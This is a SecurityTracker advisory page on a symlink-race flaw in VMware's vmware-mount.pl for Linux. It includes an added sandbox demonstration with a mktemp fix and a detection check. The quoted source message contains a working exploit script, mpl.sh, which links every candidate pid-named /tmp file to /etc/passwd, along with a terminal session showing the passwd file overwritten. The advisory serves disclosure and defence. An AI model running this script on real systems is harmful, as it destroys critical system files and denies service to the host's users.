SecurityTracker.com
Category:   Application (Generic)  >   VMware
Vendors:   VMware
VMware Allows Local Users to Overwrite Any File on the System
SecurityTracker Alert ID:  1001368
SecurityTracker URL:  http://securitytracker.com/id/1001368
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 19 2001
Impact:   Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A symlink vulnerability has been reported in vmware-mount.pl, a script that ships with the VMware package for Linux hosts and is used to mount virtual disks on the host.

While mounting a virtual disk, vmware-mount.pl creates a temporary file named vmware-mount.pl.PID in /tmp, where PID is the pid of the running script. The name is predictable and the file is created in a world-writable directory, apparently without checking that the name is not already in use, so a local user can pre-create a symlink of that name pointing at any file; when the script writes its temporary data it follows the symlink and the write lands on the symlink's target. Because a VMware virtual partition is normally mounted as root, the target can be any file on the system (the reporter overwrites /etc/passwd with the script's partition listing). The attacker does not need to guess the pid: pids are small integers, and the demonstration simply plants one symlink for every possible pid.

A demonstration exploit example is provided in the source message.
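The pattern the advisory describes, reproduced inside a throwaway directory so nothing touches /tmp or /etc, with the hardened alternative and a pre-mount check beside it. This is an added example, not code from the advisory, from the reporter or from VMware; the function names (setup_sandbox, plant_symlink, vulnerable_write, safe_write, find_planted_links) and the sample passwd line are this example's own.

```shell
#!/bin/sh
# Added example (not from the advisory or VMware): reproduce the symlink-follow
# described above inside a private sandbox, then show the hardened pattern.
# Names below (setup_sandbox, plant_symlink, ...) are this example's own.

# Build a throwaway tree: $TMPDIR_SIM stands in for world-writable /tmp,
# $TARGET stands in for the root-owned /etc/passwd (constructed content).
setup_sandbox() {
    SANDBOX=$(mktemp -d)
    TMPDIR_SIM="$SANDBOX/tmp"
    TARGET="$SANDBOX/etc_passwd"
    mkdir -p "$TMPDIR_SIM"
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$TARGET"
}

# Attacker step, unprivileged: plant a symlink at the predictable temp name.
# The real exploit does this for every pid in 2..32767 because it cannot know
# which pid root's run will get; here we plant one for the pid we simulate.
plant_symlink() {
    ln -s "$TARGET" "$TMPDIR_SIM/vmware-mount.pl.$1"
}

# Vulnerable pattern (what the advisory describes): the privileged script
# writes to <dir>/vmware-mount.pl.<pid>.  A '>' redirection opens with
# O_CREAT|O_TRUNC and follows symlinks, so the write lands on $TARGET.
vulnerable_write() {
    printf 'Nr Start Size Type Id System\n' > "$TMPDIR_SIM/vmware-mount.pl.$1"
}

# Hardened pattern: let mktemp pick an unpredictable name and create it with
# O_CREAT|O_EXCL; a pre-planted symlink can neither be guessed nor followed.
# Prints the path of the file actually written.
safe_write() {
    f=$(mktemp "$TMPDIR_SIM/vmware-mount.XXXXXXXXXX") || return 1
    printf 'Nr Start Size Type Id System\n' > "$f"
    echo "$f"
}

# Practitioner check: list pre-planted symlinks matching the script's temp
# name pattern in a directory (run it against /tmp before mounting as root).
find_planted_links() {
    find "$1" -maxdepth 1 -name 'vmware-mount.pl.*' -type l
}

# True if the simulated passwd file still has its original first line.
target_intact() {
    grep -q '^root:x:0:0:' "$TARGET"
}

cleanup_sandbox() {
    rm -rf "$SANDBOX"
}
```

Two caveats when carrying this over to a real host. First, mktemp removes the guessable name but the privileged script must also use the path mktemp returns rather than a name derived from its pid. Second, Linux 3.6 and later with fs.protected_symlinks=1 refuse to let root follow a symlink in a sticky world-writable directory owned by another user, which blocks the /tmp attack as reported; the sandbox directory above is not sticky and is owned by the same user, so the vulnerable write goes through and the overwrite is visible.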

Impact:   A local user could cause any file to be overwritten.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.vmware.com/
Cause:   Access control error
Underlying OS:  Linux (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(A User Provides Recommendations) Re: VMware Allows Local Users to Overwrite Any File on the System
A user provides some mitigating recommendations.



 Source Message Contents

Subject:  VMware symlink problems


1. Problem description
----------------------

There is a symlink vulnerability in the vmware-mount.pl script which comes
with the latest VMware.


2. Details
----------

While mounting virtual disk drives using the vmware-mount.pl script, a
temporary file named vmware-mount.pl.PID, where PID is the current pid of
the command, will be created in an insecure manner. This allows an
attacker to overwrite any local file if root mounts a VMware virtual
partition (mounting is usually done as root).

Example:

paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh

VMware local /etc/passwd DoS
By Ihq.

     linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl


after running vmware-mount.pl:

paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)

Obviously the passwd file has been overwritten:

paul@ps:/tmp > cat /etc/passwd

Nr      Start       Size Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
 1         63    2096577 BIOS  C Win95 FAT32 (LBA)


I'm not sure if it is exploitable for privilege elevation.


3. Impact
---------

Local file corruption.




---------------------- mpl.sh ----------------------

#!/bin/bash
# Pre-create a symlink named vmware-mount.pl.<pid> for every candidate pid
# (2..32766 here; 32767 is the largest pid on a default Linux of the time),
# so that whatever pid root's vmware-mount.pl run gets, its temporary file
# already exists as a symlink to /etc/passwd and the script's write lands
# in /etc/passwd instead of in /tmp.

declare -i n
declare -i mx

n=2
mx=32767

echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo

echo "     linking /etc/passwd to /tmp"

# One symlink per candidate pid. ln without -f fails on a name that already
# exists, which only skips that pid; the loop carries on regardless.
while test $n -lt $mx ; do
        ln -s /etc/passwd /tmp/vmware-mount.pl.$n
        n=$(($n + 1))
done

echo "[+] please wait for root to run vmware-mount.pl"
echo

Copyright 2019, SecurityGlobal.net LLC